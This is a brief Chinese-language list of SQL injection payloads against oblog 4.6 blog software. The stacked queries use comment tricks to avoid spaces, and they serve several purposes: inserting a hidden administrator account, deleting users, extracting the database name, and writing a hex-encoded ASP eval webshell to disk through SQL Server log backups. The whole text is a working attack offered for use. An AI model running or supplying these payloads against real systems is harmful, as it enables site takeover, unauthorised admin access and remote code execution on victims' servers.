oblog 4.6 注入的语句
username='duyao';--删除指定用户日志
s'/**/WHERE/**/logid=21949;insert/**/into/**/oblog_admin/**/
(username,password,roleid)values('duyao','00b1d1380814062d',0);-- 添加指定用
户
s'/**/WHERE/**/logid=21949;delete/**/from/**/oblog_admin/**/where/**/
username='duyao';-- 删除指定用户
备份获得webshell
s'/**/WHERE/**/logid=21949;Drop/**/table/**/cmd;--
s'/**/WHERE/**/logid=21949;create/**/table/**/cmd/**/(a/**/image);--
s'/**/WHERE/**/logid=21949;backup/**/log/**/hh/**/to/**/disk/**/=/
**/'c:\zj1244'/**/with/**/init;--
s'/**/WHERE/**/logid=21949;insert/**/into/**/cmd/**/(a)/**/
values(0x3C256576616C2072657175657374286368722833352929253E);--
s'/**/WHERE/**/logid=21949;backup/**/log/**/hh/**/to/**/disk/**/=/
**/'c:\a\a\';--
s'/**/WHERE/**/logid=21949;Drop/**/table/**/cmd;--
s'/**/WHERE/**/logid=21949;s' WHERE logid=1;update oblog_user set
useremail=db_name() where username='duyao';--